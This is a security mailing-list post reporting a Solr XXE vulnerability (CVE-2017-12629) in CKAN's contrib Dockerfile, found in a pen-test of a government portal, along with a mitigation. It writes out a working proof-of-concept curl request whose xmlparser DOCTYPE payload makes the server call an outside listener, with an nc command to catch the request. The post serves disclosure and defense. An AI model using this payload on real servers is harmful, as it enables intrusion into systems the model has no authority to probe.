[CKAN-Security] solr 6.2

• Next message: [CKAN-Security] solr 6.2
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi

We've contracted someone to pen-test data.vulekamali.gov.za who found the
following critical vulnerability in CKAN 6.2 as used in the Dockerfile
under contrib

https://www.cvedetails.com/cve/CVE-2017-12629/
https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc

We're launching our portal right now so not comfortable upgrading solr just
yet, but remapping the xmlparser name to the edismax class has mitigated it
for us for now. See
https://lucene.apache.org/solr/news.html#12-october-2017-please-secure-your-apache-solr-servers-since-a-zero-day-exploit-has-been-reported-on-a-public-mailing-list

I confirmed the vulnerability with the following curl request against a
locally-running ckan instance:
curl -v
localhost/api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D

On the IP 172.18.0.1 port 8888 I was running nc -l -p 8888 - when running
the request against ckan, I saw a GET request in nc. You can also verify
the vulnerability by looking for "Connection Refused" in the error response
which shows the server tried to request the DOCTYPE you told it to, and
would have executed malicious code you would have served.

Best
JD
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180221/2dfab6f8/attachment.html>

• Next message: [CKAN-Security] solr 6.2
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]